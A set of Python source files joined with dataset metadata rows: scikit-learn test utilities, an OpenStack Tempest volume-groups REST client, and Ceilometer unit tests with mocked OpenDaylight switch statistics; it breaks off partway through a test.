X = rng.randn(50, 10)
n_samples, n_features = X.shape
for batch_size in [11, 20, 37]:
steps = np.arange(0, X.shape[0], batch_size)
if steps[-1] != X.shape[0]:
steps = np.hstack([steps, n_samples])
for i, j in zip(steps[:-1], steps[1:]):
batch = X[i:j, :]
if i == 0:
incremental_means = batch.mean(axis=0)
incremental_variances = batch.var(axis=0)
# Assign this twice so that the test logic is consistent
incremental_count = batch.shape[0]
sample_count = batch.shape[0]
else:
result = _batch_mean_variance_update(
batch, incremental_means, incremental_variances,
sample_count)
(incremental_means, incremental_variances,
incremental_count) = result
sample_count += batch.shape[0]
calculated_means = np.mean(X[:j], axis=0)
calculated_variances = np.var(X[:j], axis=0)
assert_almost_equal(incremental_means, calculated_means, 6)
assert_almost_equal(incremental_variances,
calculated_variances, 6)
assert_equal(incremental_count, sample_count)
def test_vector_sign_flip():
# Testing that sign flip is working & largest value has positive sign
data = np.random.RandomState(36).randn(5, 5)
max_abs_rows = np.argmax(np.abs(data), axis=1)
data_flipped = _deterministic_vector_sign_flip(data)
max_rows = np.argmax(data_flipped, axis=1)
assert_array_equal(max_abs_rows, max_rows)
signs = np.sign(data[range(data.shape[0]), max_abs_rows])
assert_array_equal(data, data_flipped * signs[:, np.newaxis])
def test_softmax():
rng = np.random.RandomState(0)
X = rng.randn(3, 5)
exp_X = np.exp(X)
sum_exp_X = np.sum(exp_X, axis=1).reshape((-1, 1))
assert_array_almost_equal(softmax(X), exp_X / sum_exp_X)
| bsd-3-clause | 2,544,661,088,037,422,000 | 33.728992 | 79 | 0.605589 | false |
cisco-openstack/tempest | tempest/lib/services/volume/v3/groups_client.py | 2 | 5170 | # Copyright (C) 2017 Dell Inc. or its subsidiaries.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from oslo_serialization import jsonutils as json
from six.moves.urllib import parse as urllib
from tempest.lib.common import rest_client
from tempest.lib import exceptions as lib_exc
from tempest.lib.services.volume import base_client
class GroupsClient(base_client.BaseClient):
"""Client class to send CRUD Volume Group API requests"""
def create_group(self, **kwargs):
"""Creates a group.
group_type and volume_types are required parameters in kwargs.
For a full list of available parameters, please refer to the official
API reference:
https://docs.openstack.org/api-ref/block-storage/v3/#create-group
"""
post_body = json.dumps({'group': kwargs})
resp, body = self.post('groups', post_body)
body = json.loads(body)
self.expected_success(202, resp.status)
return rest_client.ResponseBody(resp, body)
def delete_group(self, group_id, delete_volumes=True):
"""Deletes a group.
For a full list of available parameters, please refer to the official
API reference:
https://docs.openstack.org/api-ref/block-storage/v3/#delete-group
"""
post_body = {'delete-volumes': delete_volumes}
post_body = json.dumps({'delete': post_body})
resp, body = self.post('groups/%s/action' % group_id,
post_body)
self.expected_success(202, resp.status)
return rest_client.ResponseBody(resp, body)
def show_group(self, group_id):
"""Returns the details of a single group.
For a full list of available parameters, please refer to the official
API reference:
https://docs.openstack.org/api-ref/block-storage/v3/#show-group-details
"""
url = "groups/%s" % str(group_id)
resp, body = self.get(url)
body = json.loads(body)
self.expected_success(200, resp.status)
return rest_client.ResponseBody(resp, body)
def list_groups(self, detail=False, **params):
"""Lists information for all the tenant's groups.
For a full list of available parameters, please refer to the official
API reference:
https://docs.openstack.org/api-ref/block-storage/v3/#list-groups
https://docs.openstack.org/api-ref/block-storage/v3/#list-groups-with-details
"""
url = "groups"
if detail:
url += "/detail"
if params:
url += '?%s' % urllib.urlencode(params)
resp, body = self.get(url)
body = json.loads(body)
self.expected_success(200, resp.status)
return rest_client.ResponseBody(resp, body)
def create_group_from_source(self, **kwargs):
"""Creates a group from source.
For a full list of available parameters, please refer to the official
API reference:
https://docs.openstack.org/api-ref/block-storage/v3/#create-group-from-source
"""
post_body = json.dumps({'create-from-src': kwargs})
resp, body = self.post('groups/action', post_body)
body = json.loads(body)
self.expected_success(202, resp.status)
return rest_client.ResponseBody(resp, body)
def update_group(self, group_id, **kwargs):
"""Updates the specified group.
For a full list of available parameters, please refer to the official
API reference:
https://docs.openstack.org/api-ref/block-storage/v3/#update-group
"""
put_body = json.dumps({'group': kwargs})
resp, body = self.put('groups/%s' % group_id, put_body)
self.expected_success(202, resp.status)
return rest_client.ResponseBody(resp, body)
def reset_group_status(self, group_id, status_to_set):
"""Resets group status.
For more information, please refer to the official API reference:
https://docs.openstack.org/api-ref/block-storage/v3/#reset-group-status
"""
post_body = json.dumps({'reset_status': {'status': status_to_set}})
resp, body = self.post('groups/%s/action' % group_id, post_body)
self.expected_success(202, resp.status)
return rest_client.ResponseBody(resp, body)
def is_resource_deleted(self, id):
try:
self.show_group(id)
except lib_exc.NotFound:
return True
return False
@property
def resource_type(self):
"""Returns the primary type of resource this client works with."""
return 'group'
| apache-2.0 | 3,082,253,233,467,389,000 | 38.166667 | 85 | 0.64294 | false |
r-mibu/ceilometer | ceilometer/tests/network/statistics/opendaylight/test_driver.py | 12 | 66291 | #
# Copyright 2013 NEC Corporation. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import abc
import mock
from oslotest import base
import six
from six import moves
from six.moves.urllib import parse as url_parse
from ceilometer.network.statistics.opendaylight import driver
@six.add_metaclass(abc.ABCMeta)
class _Base(base.BaseTestCase):
@abc.abstractproperty
def flow_data(self):
pass
@abc.abstractproperty
def port_data(self):
pass
@abc.abstractproperty
def table_data(self):
pass
@abc.abstractproperty
def topology_data(self):
pass
@abc.abstractproperty
def switch_data(self):
pass
@abc.abstractproperty
def user_links_data(self):
pass
@abc.abstractproperty
def active_hosts_data(self):
pass
@abc.abstractproperty
def inactive_hosts_data(self):
pass
fake_odl_url = url_parse.ParseResult('opendaylight',
'localhost:8080',
'controller/nb/v2',
None,
None,
None)
fake_params = url_parse.parse_qs('user=admin&password=admin&scheme=http&'
'container_name=default&auth=basic')
fake_params_multi_container = (
url_parse.parse_qs('user=admin&password=admin&scheme=http&'
'container_name=first&container_name=second&'
'auth=basic'))
def setUp(self):
super(_Base, self).setUp()
self.addCleanup(mock.patch.stopall)
self.driver = driver.OpenDayLightDriver()
self.get_flow_statistics = mock.patch(
'ceilometer.network.statistics.opendaylight.client.'
'StatisticsAPIClient.get_flow_statistics',
return_value=self.flow_data).start()
mock.patch('ceilometer.network.statistics.opendaylight.client.'
'StatisticsAPIClient.get_table_statistics',
return_value=self.table_data).start()
mock.patch('ceilometer.network.statistics.opendaylight.client.'
'StatisticsAPIClient.get_port_statistics',
return_value=self.port_data).start()
mock.patch('ceilometer.network.statistics.opendaylight.client.'
'TopologyAPIClient.get_topology',
return_value=self.topology_data).start()
mock.patch('ceilometer.network.statistics.opendaylight.client.'
'TopologyAPIClient.get_user_links',
return_value=self.user_links_data).start()
mock.patch('ceilometer.network.statistics.opendaylight.client.'
'SwitchManagerAPIClient.get_nodes',
return_value=self.switch_data).start()
mock.patch('ceilometer.network.statistics.opendaylight.client.'
'HostTrackerAPIClient.get_active_hosts',
return_value=self.active_hosts_data).start()
mock.patch('ceilometer.network.statistics.opendaylight.client.'
'HostTrackerAPIClient.get_inactive_hosts',
return_value=self.inactive_hosts_data).start()
def _test_for_meter(self, meter_name, expected_data):
sample_data = self.driver.get_sample_data(meter_name,
self.fake_odl_url,
self.fake_params,
{})
for sample, expected in moves.zip(sample_data, expected_data):
self.assertEqual(expected[0], sample[0]) # check volume
self.assertEqual(expected[1], sample[1]) # check resource id
self.assertEqual(expected[2], sample[2]) # check resource metadata
self.assertIsNotNone(sample[3]) # timestamp
class TestOpenDayLightDriverSpecial(_Base):
flow_data = {"flowStatistics": []}
port_data = {"portStatistics": []}
table_data = {"tableStatistics": []}
topology_data = {"edgeProperties": []}
switch_data = {"nodeProperties": []}
user_links_data = {"userLinks": []}
active_hosts_data = {"hostConfig": []}
inactive_hosts_data = {"hostConfig": []}
def test_not_implemented_meter(self):
sample_data = self.driver.get_sample_data('egg',
self.fake_odl_url,
self.fake_params,
{})
self.assertIsNone(sample_data)
sample_data = self.driver.get_sample_data('switch.table.egg',
self.fake_odl_url,
self.fake_params,
{})
self.assertIsNone(sample_data)
def test_cache(self):
cache = {}
self.driver.get_sample_data('switch',
self.fake_odl_url,
self.fake_params,
cache)
self.driver.get_sample_data('switch',
self.fake_odl_url,
self.fake_params,
cache)
self.assertEqual(1, self.get_flow_statistics.call_count)
cache = {}
self.driver.get_sample_data('switch',
self.fake_odl_url,
self.fake_params,
cache)
self.assertEqual(2, self.get_flow_statistics.call_count)
def test_multi_container(self):
cache = {}
self.driver.get_sample_data('switch',
self.fake_odl_url,
self.fake_params_multi_container,
cache)
self.assertEqual(2, self.get_flow_statistics.call_count)
self.assertIn('network.statistics.opendaylight', cache)
odl_data = cache['network.statistics.opendaylight']
self.assertIn('first', odl_data)
self.assertIn('second', odl_data)
def test_http_error(self):
mock.patch('ceilometer.network.statistics.opendaylight.client.'
'StatisticsAPIClient.get_flow_statistics',
side_effect=Exception()).start()
sample_data = self.driver.get_sample_data('switch',
self.fake_odl_url,
self.fake_params,
{})
self.assertEqual(0, len(sample_data))
mock.patch('ceilometer.network.statistics.opendaylight.client.'
'StatisticsAPIClient.get_flow_statistics',
side_effect=[Exception(), self.flow_data]).start()
cache = {}
self.driver.get_sample_data('switch',
self.fake_odl_url,
self.fake_params_multi_container,
cache)
self.assertIn('network.statistics.opendaylight', cache)
odl_data = cache['network.statistics.opendaylight']
self.assertIn('second', odl_data)
class TestOpenDayLightDriverSimple(_Base):
flow_data = {
"flowStatistics": [
{
"node": {
"id": "00:00:00:00:00:00:00:02",
"type": "OF"
},
"flowStatistic": [
{
"flow": {
"match": {
"matchField": [
{
"type": "DL_TYPE",
"value": "2048"
},
{
"mask": "255.255.255.255",
"type": "NW_DST",
"value": "1.1.1.1"
}
]
},
"actions": {
"@type": "output",
"port": {
"id": "3",
"node": {
"id": "00:00:00:00:00:00:00:02",
"type": "OF"
},
"type": "OF"
}
},
"hardTimeout": "0",
"id": "0",
"idleTimeout": "0",
"priority": "1"
},
"byteCount": "0",
"durationNanoseconds": "397000000",
"durationSeconds": "1828",
"packetCount": "0",
"tableId": "0"
},
]
}
]
}
port_data = {
"portStatistics": [
{
"node": {
"id": "00:00:00:00:00:00:00:02",
"type": "OF"
},
"portStatistic": [
{
"nodeConnector": {
"id": "4",
"node": {
"id": "00:00:00:00:00:00:00:02",
"type": "OF"
},
"type": "OF"
},
"collisionCount": "0",
"receiveBytes": "0",
"receiveCrcError": "0",
"receiveDrops": "0",
"receiveErrors": "0",
"receiveFrameError": "0",
"receiveOverRunError": "0",
"receivePackets": "0",
"transmitBytes": "0",
"transmitDrops": "0",
"transmitErrors": "0",
"transmitPackets": "0"
},
]
}
]
}
table_data = {
"tableStatistics": [
{
"node": {
"id": "00:00:00:00:00:00:00:02",
"type": "OF"
},
"tableStatistic": [
{
"activeCount": "11",
"lookupCount": "816",
"matchedCount": "220",
"nodeTable": {
"id": "0",
"node": {
"id": "00:00:00:00:00:00:00:02",
"type": "OF"
}
}
},
]
}
]
}
topology_data = {"edgeProperties": []}
switch_data = {
"nodeProperties": [
{
"node": {
"id": "00:00:00:00:00:00:00:02",
"type": "OF"
},
"properties": {
"actions": {
"value": "4095"
},
"timeStamp": {
"name": "connectedSince",
"value": "1377291227877"
}
}
},
]
}
user_links_data = {"userLinks": []}
active_hosts_data = {"hostConfig": []}
inactive_hosts_data = {"hostConfig": []}
def test_meter_switch(self):
expected_data = [
(1, "00:00:00:00:00:00:00:02", {
'controller': 'OpenDaylight',
'container': 'default',
"properties_actions": "4095",
"properties_timeStamp_connectedSince": "1377291227877"
}),
]
self._test_for_meter('switch', expected_data)
def test_meter_switch_port(self):
expected_data = [
(1, "00:00:00:00:00:00:00:02", {
'controller': 'OpenDaylight',
'container': 'default',
'port': '4',
}),
]
self._test_for_meter('switch.port', expected_data)
def test_meter_switch_port_receive_packets(self):
expected_data = [
(0, "00:00:00:00:00:00:00:02", {
'controller': 'OpenDaylight',
'container': 'default',
'port': '4'}),
]
self._test_for_meter('switch.port.receive.packets', expected_data)
def test_meter_switch_port_transmit_packets(self):
expected_data = [
(0, "00:00:00:00:00:00:00:02", {
'controller': 'OpenDaylight',
'container': 'default',
'port': '4'}),
]
self._test_for_meter('switch.port.transmit.packets', expected_data)
def test_meter_switch_port_receive_bytes(self):
expected_data = [
(0, "00:00:00:00:00:00:00:02", {
'controller': 'OpenDaylight',
'container': 'default',
'port': '4'}),
]
self._test_for_meter('switch.port.receive.bytes', expected_data)
def test_meter_switch_port_transmit_bytes(self):
expected_data = [
(0, "00:00:00:00:00:00:00:02", {
'controller': 'OpenDaylight',
'container': 'default',
'port': '4'}),
]
self._test_for_meter('switch.port.transmit.bytes', expected_data)
def test_meter_switch_port_receive_drops(self):
expected_data = [
(0, "00:00:00:00:00:00:00:02", {
'controller': 'OpenDaylight',
'container': 'default',
'port': '4'}),
]
self._test_for_meter('switch.port.receive.drops', expected_data)
def test_meter_switch_port_transmit_drops(self):
expected_data = [
(0, "00:00:00:00:00:00:00:02", {
'controller': 'OpenDaylight',
'container': 'default',
'port': '4'}),
]
self._test_for_meter('switch.port.transmit.drops', expected_data)
def test_meter_switch_port_receive_errors(self):
expected_data = [
(0, "00:00:00:00:00:00:00:02", {
'controller': 'OpenDaylight',
'container': 'default',
'port': '4'}),
]
self._test_for_meter('switch.port.receive.errors', expected_data)
def test_meter_switch_port_transmit_errors(self):
expected_data = [
(0, "00:00:00:00:00:00:00:02", {
'controller': 'OpenDaylight',
'container': 'default',
'port': '4'}),
]
self._test_for_meter('switch.port.transmit.errors', expected_data)
def test_meter_switch_port_receive_frame_error(self):
expected_data = [
(0, "00:00:00:00:00:00:00:02", {
'controller': 'OpenDaylight',
'container': 'default',
'port': '4'}),
]
self._test_for_meter('switch.port.receive.frame_error', expected_data)
def test_meter_switch_port_receive_overrun_error(self):
expected_data = [
(0, "00:00:00:00:00:00:00:02", {
'controller': 'OpenDaylight',
'container': 'default',
'port': '4'}),
]
self._test_for_meter('switch.port.receive.overrun_error',
expected_data)
def test_meter_switch_port_receive_crc_error(self):
expected_data = [
(0, "00:00:00:00:00:00:00:02", {
'controller': 'OpenDaylight',
'container': 'default',
'port': '4'}),
]
self._test_for_meter('switch.port.receive.crc_error', expected_data)
def test_meter_switch_port_collision_count(self):
expected_data = [
(0, "00:00:00:00:00:00:00:02", {
'controller': 'OpenDaylight',
'container': 'default',
'port': '4'}),
]
self._test_for_meter('switch.port.collision.count', expected_data)
def test_meter_switch_table(self):
expected_data = [
(1, "00:00:00:00:00:00:00:02", {
'controller': 'OpenDaylight',
'container': 'default',
'table_id': '0'}),
]
self._test_for_meter('switch.table', expected_data)
def test_meter_switch_table_active_entries(self):
expected_data = [
(11, "00:00:00:00:00:00:00:02", {
'controller': 'OpenDaylight',
'container': 'default',
'table_id': '0'}),
]
self._test_for_meter('switch.table.active.entries', expected_data)
def test_meter_switch_table_lookup_packets(self):
expected_data = [
(816, "00:00:00:00:00:00:00:02", {
'controller': 'OpenDaylight',
'container': 'default',
'table_id': '0'}),
]
self._test_for_meter('switch.table.lookup.packets', expected_data)
def test_meter_switch_table_matched_packets(self):
expected_data = [
(220, "00:00:00:00:00:00:00:02", {
'controller': 'OpenDaylight',
'container': 'default',
'table_id': '0'}),
]
self._test_for_meter('switch.table.matched.packets', expected_data)
def test_meter_switch_flow(self):
expected_data = [
(1, "00:00:00:00:00:00:00:02", {
'controller': 'OpenDaylight',
'container': 'default',
'table_id': '0',
'flow_id': '0',
"flow_match_matchField[0]_type": "DL_TYPE",
"flow_match_matchField[0]_value": "2048",
"flow_match_matchField[1]_mask": "255.255.255.255",
"flow_match_matchField[1]_type": "NW_DST",
"flow_match_matchField[1]_value": "1.1.1.1",
"flow_actions_@type": "output",
"flow_actions_port_id": "3",
"flow_actions_port_node_id": "00:00:00:00:00:00:00:02",
"flow_actions_port_node_type": "OF",
"flow_actions_port_type": "OF",
"flow_hardTimeout": "0",
"flow_idleTimeout": "0",
"flow_priority": "1"
}),
]
self._test_for_meter('switch.flow', expected_data)
def test_meter_switch_flow_duration_seconds(self):
expected_data = [
(1828, "00:00:00:00:00:00:00:02", {
'controller': 'OpenDaylight',
'container': 'default',
'table_id': '0',
'flow_id': '0',
"flow_match_matchField[0]_type": "DL_TYPE",
"flow_match_matchField[0]_value": "2048",
"flow_match_matchField[1]_mask": "255.255.255.255",
"flow_match_matchField[1]_type": "NW_DST",
"flow_match_matchField[1]_value": "1.1.1.1",
"flow_actions_@type": "output",
"flow_actions_port_id": "3",
"flow_actions_port_node_id": "00:00:00:00:00:00:00:02",
"flow_actions_port_node_type": "OF",
"flow_actions_port_type": "OF",
"flow_hardTimeout": "0",
"flow_idleTimeout": "0",
"flow_priority": "1"}),
]
self._test_for_meter('switch.flow.duration_seconds', expected_data)
def test_meter_switch_flow_duration_nanoseconds(self):
expected_data = [
(397000000, "00:00:00:00:00:00:00:02", {
'controller': 'OpenDaylight',
'container': 'default',
'table_id': '0',
'flow_id': '0',
"flow_match_matchField[0]_type": "DL_TYPE",
"flow_match_matchField[0]_value": "2048",
"flow_match_matchField[1]_mask": "255.255.255.255",
"flow_match_matchField[1]_type": "NW_DST",
"flow_match_matchField[1]_value": "1.1.1.1",
"flow_actions_@type": "output",
"flow_actions_port_id": "3",
"flow_actions_port_node_id": "00:00:00:00:00:00:00:02",
"flow_actions_port_node_type": "OF",
"flow_actions_port_type": "OF",
"flow_hardTimeout": "0",
"flow_idleTimeout": "0",
"flow_priority": "1"}),
]
self._test_for_meter('switch.flow.duration_nanoseconds', expected_data)
def test_meter_switch_flow_packets(self):
expected_data = [
(0, "00:00:00:00:00:00:00:02", {
'controller': 'OpenDaylight',
'container': 'default',
'table_id': '0',
'flow_id': '0',
"flow_match_matchField[0]_type": "DL_TYPE",
"flow_match_matchField[0]_value": "2048",
"flow_match_matchField[1]_mask": "255.255.255.255",
"flow_match_matchField[1]_type": "NW_DST",
"flow_match_matchField[1]_value": "1.1.1.1",
"flow_actions_@type": "output",
"flow_actions_port_id": "3",
"flow_actions_port_node_id": "00:00:00:00:00:00:00:02",
"flow_actions_port_node_type": "OF",
"flow_actions_port_type": "OF",
"flow_hardTimeout": "0",
"flow_idleTimeout": "0",
"flow_priority": "1"}),
]
self._test_for_meter('switch.flow.packets', expected_data)
def test_meter_switch_flow_bytes(self):
expected_data = [
(0, "00:00:00:00:00:00:00:02", {
'controller': 'OpenDaylight',
'container': 'default',
'table_id': '0',
'flow_id': '0',
"flow_match_matchField[0]_type": "DL_TYPE",
"flow_match_matchField[0]_value": "2048",
"flow_match_matchField[1]_mask": "255.255.255.255",
"flow_match_matchField[1]_type": "NW_DST",
"flow_match_matchField[1]_value": "1.1.1.1",
"flow_actions_@type": "output",
"flow_actions_port_id": "3",
"flow_actions_port_node_id": "00:00:00:00:00:00:00:02",
"flow_actions_port_node_type": "OF",
"flow_actions_port_type": "OF",
"flow_hardTimeout": "0",
"flow_idleTimeout": "0",
"flow_priority": "1"}),
]
self._test_for_meter('switch.flow.bytes', expected_data)
class TestOpenDayLightDriverComplex(_Base):
flow_data = {
"flowStatistics": [
{
"node": {
"id": "00:00:00:00:00:00:00:02",
"type": "OF"
},
"flowStatistic": [
{
"flow": {
"match": {
"matchField": [
{
"type": "DL_TYPE",
"value": "2048"
},
{
"mask": "255.255.255.255",
"type": "NW_DST",
"value": "1.1.1.1"
}
]
},
"actions": {
"@type": "output",
"port": {
"id": "3",
"node": {
"id": "00:00:00:00:00:00:00:02",
"type": "OF"
},
"type": "OF"
}
},
"hardTimeout": "0",
"id": "0",
"idleTimeout": "0",
"priority": "1"
},
"byteCount": "0",
"durationNanoseconds": "397000000",
"durationSeconds": "1828",
"packetCount": "0",
"tableId": "0"
},
{
"flow": {
"match": {
"matchField": [
{
"type": "DL_TYPE",
"value": "2048"
},
{
"mask": "255.255.255.255",
"type": "NW_DST",
"value": "1.1.1.2"
}
]
},
"actions": {
"@type": "output",
"port": {
"id": "4",
"node": {
"id": "00:00:00:00:00:00:00:03",
"type": "OF"
},
"type": "OF"
}
},
"hardTimeout": "0",
"id": "0",
"idleTimeout": "0",
"priority": "1"
},
"byteCount": "89",
"durationNanoseconds": "200000",
"durationSeconds": "5648",
"packetCount": "30",
"tableId": "1"
}
]
}
]
}
port_data = {
"portStatistics": [
{
"node": {
"id": "00:00:00:00:00:00:00:02",
"type": "OF"
},
"portStatistic": [
{
"nodeConnector": {
"id": "4",
"node": {
"id": "00:00:00:00:00:00:00:02",
"type": "OF"
},
"type": "OF"
},
"collisionCount": "0",
"receiveBytes": "0",
"receiveCrcError": "0",
"receiveDrops": "0",
"receiveErrors": "0",
"receiveFrameError": "0",
"receiveOverRunError": "0",
"receivePackets": "0",
"transmitBytes": "0",
"transmitDrops": "0",
"transmitErrors": "0",
"transmitPackets": "0"
},
{
"nodeConnector": {
"id": "3",
"node": {
"id": "00:00:00:00:00:00:00:02",
"type": "OF"
},
"type": "OF"
},
"collisionCount": "0",
"receiveBytes": "12740",
"receiveCrcError": "0",
"receiveDrops": "0",
"receiveErrors": "0",
"receiveFrameError": "0",
"receiveOverRunError": "0",
"receivePackets": "182",
"transmitBytes": "12110",
"transmitDrops": "0",
"transmitErrors": "0",
"transmitPackets": "173"
},
{
"nodeConnector": {
"id": "2",
"node": {
"id": "00:00:00:00:00:00:00:02",
"type": "OF"
},
"type": "OF"
},
"collisionCount": "0",
"receiveBytes": "12180",
"receiveCrcError": "0",
"receiveDrops": "0",
"receiveErrors": "0",
"receiveFrameError": "0",
"receiveOverRunError": "0",
"receivePackets": "174",
"transmitBytes": "12670",
"transmitDrops": "0",
"transmitErrors": "0",
"transmitPackets": "181"
},
{
"nodeConnector": {
"id": "1",
"node": {
"id": "00:00:00:00:00:00:00:02",
"type": "OF"
},
"type": "OF"
},
"collisionCount": "0",
"receiveBytes": "0",
"receiveCrcError": "0",
"receiveDrops": "0",
"receiveErrors": "0",
"receiveFrameError": "0",
"receiveOverRunError": "0",
"receivePackets": "0",
"transmitBytes": "0",
"transmitDrops": "0",
"transmitErrors": "0",
"transmitPackets": "0"
},
{
"nodeConnector": {
"id": "0",
"node": {
"id": "00:00:00:00:00:00:00:02",
"type": "OF"
},
"type": "OF"
},
"collisionCount": "0",
"receiveBytes": "0",
"receiveCrcError": "0",
"receiveDrops": "0",
"receiveErrors": "0",
"receiveFrameError": "0",
"receiveOverRunError": "0",
"receivePackets": "0",
"transmitBytes": "0",
"transmitDrops": "0",
"transmitErrors": "0",
"transmitPackets": "0"
}
]
}
]
}
table_data = {
"tableStatistics": [
{
"node": {
"id": "00:00:00:00:00:00:00:02",
"type": "OF"
},
"tableStatistic": [
{
"activeCount": "11",
"lookupCount": "816",
"matchedCount": "220",
"nodeTable": {
"id": "0",
"node": {
"id": "00:00:00:00:00:00:00:02",
"type": "OF"
}
}
},
{
"activeCount": "20",
"lookupCount": "10",
"matchedCount": "5",
"nodeTable": {
"id": "1",
"node": {
"id": "00:00:00:00:00:00:00:02",
"type": "OF"
}
}
}
]
}
]
}
topology_data = {
"edgeProperties": [
{
"edge": {
"headNodeConnector": {
"id": "2",
"node": {
"id": "00:00:00:00:00:00:00:03",
"type": "OF"
},
"type": "OF"
},
"tailNodeConnector": {
"id": "2",
"node": {
"id": "00:00:00:00:00:00:00:02",
"type": "OF"
},
"type": "OF"
}
},
"properties": {
"bandwidth": {
"value": 10000000000
},
"config": {
"value": 1
},
"name": {
"value": "s2-eth3"
},
"state": {
"value": 1
},
"timeStamp": {
"name": "creation",
"value": 1379527162648
}
}
},
{
"edge": {
"headNodeConnector": {
"id": "5",
"node": {
"id": "00:00:00:00:00:00:00:02",
"type": "OF"
},
"type": "OF"
},
"tailNodeConnector": {
"id": "2",
"node": {
"id": "00:00:00:00:00:00:00:04",
"type": "OF"
},
"type": "OF"
}
},
"properties": {
"timeStamp": {
"name": "creation",
"value": 1379527162648
}
}
}
]
}
switch_data = {
"nodeProperties": [
{
"node": {
"id": "00:00:00:00:00:00:00:02",
"type": "OF"
},
"properties": {
"actions": {
"value": "4095"
},
"buffers": {
"value": "256"
},
"capabilities": {
"value": "199"
},
"description": {
"value": "None"
},
"macAddress": {
"value": "00:00:00:00:00:02"
},
"tables": {
"value": "-1"
},
"timeStamp": {
"name": "connectedSince",
"value": "1377291227877"
}
}
},
{
"node": {
"id": "00:00:00:00:00:00:00:03",
"type": "OF"
},
"properties": {
"actions": {
"value": "1024"
},
"buffers": {
"value": "512"
},
"capabilities": {
"value": "1000"
},
"description": {
"value": "Foo Bar"
},
"macAddress": {
"value": "00:00:00:00:00:03"
},
"tables": {
"value": "10"
},
"timeStamp": {
"name": "connectedSince",
"value": "1377291228000"
}
}
}
]
}
user_links_data = {
"userLinks": [
{
"dstNodeConnector": "OF|5@OF|00:00:00:00:00:00:00:05",
"name": "link1",
"srcNodeConnector": "OF|3@OF|00:00:00:00:00:00:00:02",
"status": "Success"
}
]
}
active_hosts_data = {
"hostConfig": [
{
"dataLayerAddress": "00:00:00:00:01:01",
"networkAddress": "1.1.1.1",
"nodeConnectorId": "9",
"nodeConnectorType": "OF",
"nodeId": "00:00:00:00:00:00:00:01",
"nodeType": "OF",
"staticHost": "false",
"vlan": "0"
},
{
"dataLayerAddress": "00:00:00:00:02:02",
"networkAddress": "2.2.2.2",
"nodeConnectorId": "1",
"nodeConnectorType": "OF",
"nodeId": "00:00:00:00:00:00:00:02",
"nodeType": "OF",
"staticHost": "true",
"vlan": "0"
}
]
}
inactive_hosts_data = {
"hostConfig": [
{
"dataLayerAddress": "00:00:00:01:01:01",
"networkAddress": "1.1.1.3",
"nodeConnectorId": "8",
"nodeConnectorType": "OF",
"nodeId": "00:00:00:00:00:00:00:01",
"nodeType": "OF",
"staticHost": "false",
"vlan": "0"
},
{
"dataLayerAddress": "00:00:00:01:02:02",
"networkAddress": "2.2.2.4",
"nodeConnectorId": "0",
"nodeConnectorType": "OF",
"nodeId": "00:00:00:00:00:00:00:02",
"nodeType": "OF",
"staticHost": "false",
"vlan": "1"
}
]
}
def test_meter_switch(self):
expected_data = [
(1, "00:00:00:00:00:00:00:02", {
'controller': 'OpenDaylight',
'container': 'default',
"properties_actions": "4095",
"properties_buffers": "256",
"properties_capabilities": "199",
"properties_description": "None",
"properties_macAddress": "00:00:00:00:00:02",
"properties_tables": "-1",
"properties_timeStamp_connectedSince": "1377291227877"
}),
(1, "00:00:00:00:00:00:00:03", {
'controller': 'OpenDaylight',
'container': 'default',
"properties_actions": "1024",
"properties_buffers": "512",
"properties_capabilities": "1000",
"properties_description": "Foo Bar",
"properties_macAddress": "00:00:00:00:00:03",
"properties_tables": "10",
"properties_timeStamp_connectedSince": "1377291228000"
}),
]
self._test_for_meter('switch', expected_data)
def test_meter_switch_port(self):
expected_data = [
(1, "00:00:00:00:00:00:00:02", {
'controller': 'OpenDaylight',
'container': 'default',
'port': '4',
}),
(1, "00:00:00:00:00:00:00:02", {
'controller': 'OpenDaylight',
'container': 'default',
'port': '3',
'user_link_node_id': '00:00:00:00:00:00:00:05',
'user_link_node_port': '5',
'user_link_status': 'Success',
'user_link_name': 'link1',
}),
(1, "00:00:00:00:00:00:00:02", {
'controller': 'OpenDaylight',
'container': 'default',
'port': '2',
'topology_node_id': '00:00:00:00:00:00:00:03',
'topology_node_port': '2',
"topology_bandwidth": 10000000000,
"topology_config": 1,
"topology_name": "s2-eth3",
"topology_state": 1,
"topology_timeStamp_creation": 1379527162648
}),
(1, "00:00:00:00:00:00:00:02", {
'controller': 'OpenDaylight',
'container': 'default',
'port': '1',
'host_status': 'active',
'host_dataLayerAddress': '00:00:00:00:02:02',
'host_networkAddress': '2.2.2.2',
'host_staticHost': 'true',
'host_vlan': '0',
}),
(1, "00:00:00:00:00:00:00:02", {
'controller': 'OpenDaylight',
'container': 'default',
'port': '0',
'host_status': 'inactive',
'host_dataLayerAddress': '00:00:00:01:02:02',
'host_networkAddress': '2.2.2.4',
'host_staticHost': 'false',
'host_vlan': '1',
}),
]
self._test_for_meter('switch.port', expected_data)
def test_meter_switch_port_receive_packets(self):
expected_data = [
(0, "00:00:00:00:00:00:00:02", {
'controller': 'OpenDaylight',
'container': 'default',
'port': '4'}),
(182, "00:00:00:00:00:00:00:02", {
'controller': 'OpenDaylight',
'container': 'default',
'port': '3'}),
(174, "00:00:00:00:00:00:00:02", {
'controller': 'OpenDaylight',
'container': 'default',
'port': '2'}),
(0, "00:00:00:00:00:00:00:02", {
'controller': 'OpenDaylight',
'container': 'default',
'port': '1'}),
(0, "00:00:00:00:00:00:00:02", {
'controller': 'OpenDaylight',
'container': 'default',
'port': '0'}),
]
self._test_for_meter('switch.port.receive.packets', expected_data)
def test_meter_switch_port_transmit_packets(self):
expected_data = [
(0, "00:00:00:00:00:00:00:02", {
'controller': 'OpenDaylight',
'container': 'default',
'port': '4'}),
(173, "00:00:00:00:00:00:00:02", {
'controller': 'OpenDaylight',
'container': 'default',
'port': '3'}),
(181, "00:00:00:00:00:00:00:02", {
'controller': 'OpenDaylight',
'container': 'default',
'port': '2'}),
(0, "00:00:00:00:00:00:00:02", {
'controller': 'OpenDaylight',
